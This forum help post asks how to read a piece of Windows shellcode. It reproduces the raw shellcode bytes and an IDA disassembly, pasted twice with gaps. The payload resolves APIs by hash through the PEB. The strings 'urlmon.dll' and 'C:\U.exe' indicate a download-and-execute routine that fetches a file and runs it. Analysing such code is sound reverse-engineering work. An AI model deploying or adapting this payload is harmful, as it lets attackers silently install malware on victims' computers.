-
-
求助]这段shellcode怎么理解?
-
发表于: 2009-8-7 18:56 2937
-
"\x90\x90\x90\x90\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\x7e\xd8\xe2\x73\xe8\x40\xff\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff"
mov esi, [ebp+3Ch]
.data:00422A39 8B 74 35 78 mov esi, [ebp+esi+78h]
.data:00422A3D 03 F5 add esi, ebp
.data:00422A3F 56 push esi
.data:00422A40 8B 76 20 mov esi, [esi+20h]
.data:00422A43 03 F5 add esi, ebp
.data:00422A45 33 C9 xor ecx, ecx
.data:00422A47 49 dec ecx
.data:00422A47
.data:00422A48
.data:00422A48 loc_422A48: ; CODE XREF: sub_422A36+29j
.data:00422A48 41 inc ecx
.data:00422A49 AD lodsd
.data:00422A4A 33 DB xor ebx, ebx
.data:00422A4A
.data:00422A4C
movsx edx, byte ptr ss:[eax+ebp]
.data:00422A51 38 F2 cmp dl, dh
.data:00422A53 74 08 jz short loc_422A5D
.data:00422A53
.data:00422A55 C1 CB 0D ror ebx, 0Dh
.data:00422A58 03 DA add ebx, edx
.data:00422A5A 40 inc eax
.data:00422A5B EB EF jmp short loc_422A4C
cmp ebx, edi
.data:00422A5F 75 E7 jnz short loc_422A48
.data:00422A5F
.data:00422A61 5E pop esi
.data:00422A62 8B 5E 24 mov ebx, [esi+24h]
.data:00422A65 03 DD add ebx, ebp
.data:00422A67 66 8B 0C 4B mov cx, [ebx+ecx*2]
.data:00422A6B 8B 5E 1C mov ebx, [esi+1Ch]
.data:00422A6E 03 DD add ebx, ebp
.data:00422A70 8B 04 8B mov eax, [ebx+ecx*4]
.data:00422A73 03 C5 add eax, ebp
.data:00422A75 C3 retn
db 75h ; u
.data:00422A77 72 db 72h ; r
.data:00422A78 6C db 6Ch ; l
.data:00422A79 6D db 6Dh ; m
.data:00422A7A 6F db 6Fh ; o
.data:00422A7B 6E db 6Eh ; n
.data:00422A7C 2E db 2Eh ; .
.data:00422A7D 64 db 64h ; d
.data:00422A7E 6C db 6Ch ; l
.data:00422A7F 6C db 6Ch ; l
.data:00422A80 00 db 0
.data:00422A81 43 db 43h ; C
.data:00422A82 3A db 3Ah ; :
.data:00422A83 5C db 5Ch ; \
.data:00422A84 55 db 55h ; U
.data:00422A85 2E db 2Eh ; .
.data:00422A86 65 db 65h ; e
.data:00422A87 78 db 78h ; x
.data:00422A88 65 db 65h ; e
.data:00422A89 00 db 0
.data:00422A8A ; ---------------------------------------------------------------------------
.data:00422A8A
.data:00422A8A loc_422A8A: ; CODE XREF: .data:00422A34j
.data:00422A8A 33 C0 xor eax, eax
.data:00422A8C 64 03 40 30 add eax, fs:[eax+30h]
.data:00422A90 78 0C js short loc_422A9E
.data:00422A90
.data:00422A92 8B 40 0C mov eax, [eax+0Ch]
.data:00422A95 8B 70 1C mov esi, [eax+1Ch]
.data:00422A98 AD lodsd
.data:00422A99 8B 40 08 mov eax, [eax+8]
.data:00422A9C EB 09 jmp short loc_422AA7
loc_422AD5: ; CODE XREF: .data:loc_422AF9p
.data:00422AD5 53 push ebx
.data:00422AD6 FF D0 call eax
.data:00422AD8 5D pop ebp
.data:00422AD9 BF 98 FE 8A 0E mov edi, 0E8AFE98h ; <suspicious>
.data:00422ADE E8 53 FF FF FF call sub_422A36
.data:00422ADE
.data:00422AE3 83 EC 04 sub esp, 4
.data:00422AE6 83 2C 24 62 sub dword ptr [esp], 62h
.data:00422AEA FF D0 call eax
.data:00422AEC BF 7E D8 E2 73 mov edi, 73E2D87Eh ; <suspicious>
.data:00422AF1 E8 40 FF FF FF call sub_422A36
.data:00422AF1
.data:00422AF6 52 push edx
.data:00422AF7 FF D0 call eax
.data:00422AF7
.data:00422AF9
.data:00422AF9 loc_422AF9: ; CODE XREF: .data:00422AD3j
.data:00422AF9 E8 D7 FF FF FF call loc_422AD5
mov esi, [ebp+3Ch]
.data:00422A39 8B 74 35 78 mov esi, [ebp+esi+78h]
.data:00422A3D 03 F5 add esi, ebp
.data:00422A3F 56 push esi
.data:00422A40 8B 76 20 mov esi, [esi+20h]
.data:00422A43 03 F5 add esi, ebp
.data:00422A45 33 C9 xor ecx, ecx
.data:00422A47 49 dec ecx
.data:00422A47
.data:00422A48
.data:00422A48 loc_422A48: ; CODE XREF: sub_422A36+29j
.data:00422A48 41 inc ecx
.data:00422A49 AD lodsd
.data:00422A4A 33 DB xor ebx, ebx
.data:00422A4A
.data:00422A4C
movsx edx, byte ptr ss:[eax+ebp]
.data:00422A51 38 F2 cmp dl, dh
.data:00422A53 74 08 jz short loc_422A5D
.data:00422A53
.data:00422A55 C1 CB 0D ror ebx, 0Dh
.data:00422A58 03 DA add ebx, edx
.data:00422A5A 40 inc eax
.data:00422A5B EB EF jmp short loc_422A4C
cmp ebx, edi
.data:00422A5F 75 E7 jnz short loc_422A48
.data:00422A5F
.data:00422A61 5E pop esi
.data:00422A62 8B 5E 24 mov ebx, [esi+24h]
.data:00422A65 03 DD add ebx, ebp
.data:00422A67 66 8B 0C 4B mov cx, [ebx+ecx*2]
.data:00422A6B 8B 5E 1C mov ebx, [esi+1Ch]
.data:00422A6E 03 DD add ebx, ebp
.data:00422A70 8B 04 8B mov eax, [ebx+ecx*4]
.data:00422A73 03 C5 add eax, ebp
.data:00422A75 C3 retn
db 75h ; u
.data:00422A77 72 db 72h ; r
.data:00422A78 6C db 6Ch ; l
.data:00422A79 6D db 6Dh ; m
.data:00422A7A 6F db 6Fh ; o
.data:00422A7B 6E db 6Eh ; n
.data:00422A7C 2E db 2Eh ; .
.data:00422A7D 64 db 64h ; d
.data:00422A7E 6C db 6Ch ; l
.data:00422A7F 6C db 6Ch ; l
.data:00422A80 00 db 0
.data:00422A81 43 db 43h ; C
.data:00422A82 3A db 3Ah ; :
.data:00422A83 5C db 5Ch ; \
.data:00422A84 55 db 55h ; U
.data:00422A85 2E db 2Eh ; .
.data:00422A86 65 db 65h ; e
.data:00422A87 78 db 78h ; x
.data:00422A88 65 db 65h ; e
.data:00422A89 00 db 0
.data:00422A8A ; ---------------------------------------------------------------------------
.data:00422A8A
.data:00422A8A loc_422A8A: ; CODE XREF: .data:00422A34j
.data:00422A8A 33 C0 xor eax, eax
.data:00422A8C 64 03 40 30 add eax, fs:[eax+30h]
.data:00422A90 78 0C js short loc_422A9E
.data:00422A90
.data:00422A92 8B 40 0C mov eax, [eax+0Ch]
.data:00422A95 8B 70 1C mov esi, [eax+1Ch]
.data:00422A98 AD lodsd
.data:00422A99 8B 40 08 mov eax, [eax+8]
.data:00422A9C EB 09 jmp short loc_422AA7
loc_422AD5: ; CODE XREF: .data:loc_422AF9p
.data:00422AD5 53 push ebx
.data:00422AD6 FF D0 call eax
.data:00422AD8 5D pop ebp
.data:00422AD9 BF 98 FE 8A 0E mov edi, 0E8AFE98h ; <suspicious>
.data:00422ADE E8 53 FF FF FF call sub_422A36
.data:00422ADE
.data:00422AE3 83 EC 04 sub esp, 4
.data:00422AE6 83 2C 24 62 sub dword ptr [esp], 62h
.data:00422AEA FF D0 call eax
.data:00422AEC BF 7E D8 E2 73 mov edi, 73E2D87Eh ; <suspicious>
.data:00422AF1 E8 40 FF FF FF call sub_422A36
.data:00422AF1
.data:00422AF6 52 push edx
.data:00422AF7 FF D0 call eax
.data:00422AF7
.data:00422AF9
.data:00422AF9 loc_422AF9: ; CODE XREF: .data:00422AD3j
.data:00422AF9 E8 D7 FF FF FF call loc_422AD5
赞赏
他的文章
- [求助]hook 代理函书作用 5866
- [求助]文件监控等问题 4005
- [求助]驱动中拷贝文件问题 5179
- [求助]对文件拷贝的监控 6017
- [求助]驱动hook运行问题 3856
看原图
赞赏
雪币:
留言: